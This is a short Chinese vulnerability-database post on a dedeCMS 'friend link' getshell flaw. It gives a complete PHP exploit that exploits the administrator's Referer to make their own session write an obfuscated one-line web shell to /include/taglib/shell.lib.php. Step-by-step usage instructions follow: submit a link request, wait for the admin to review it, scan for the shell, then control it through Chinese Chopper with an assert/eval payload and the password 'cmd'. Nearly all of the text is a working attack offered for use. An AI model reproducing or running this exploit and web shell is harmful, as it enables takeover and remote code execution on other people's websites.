dedeCMS友情链接getshell漏洞
- 发表于
- Vulndb
1 2 3 4 5 6 7 8 9 10 11 12 13 |
<?php //print_r($_SERVER); $referer = $_SERVER['HTTP_REFERER']; $dede_login = str_replace("friendlink_main.php","",$referer);//去掉friendlink_main.php,取得dede后台的路径 //拼接 exp $muma = '<'.'?'.'p'.'h'.'p'.' '.'p'.'h'.'p'.'i'.'n'.'f'.'o'.'('.')'.';'.'?'.'>'.'<'.'?'.'p'.'h'.'p'.' '.'e'.'x'.'t'.'r'.'a'.'c'.'t'.'('.'$'.'_'.'G'.'E'.'T'.')'.'.'.'$'.'a'.'('.'$'.'b'.'['.'0'.']'.')'.';'.'?'.'>'; $exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php'; $url = $dede_login.$exp; //echo $url; header("location: ".$url); // send mail coder exit(); ?> |
使用
代码存为PHP文件,上传到你的空间。去提前友连申请,网址填写你上传后的地址。
站长审核后台友情连接时会生成一句话地址为/include/taglib/shell.lib.php
御剑字典添加/include/taglib/shell.lib.php
测试是否存活即可
最后菜刀访问传参一句话http://site.com/include/taglib/shell.lib.php?a=assert&b[0]=@eval($_POST[cmd]);
密码为cmd
原文连接:dedeCMS友情链接getshell漏洞
所有媒体,可在保留署名、
原文连接
的情况下转载,若非则不得使用我方内容。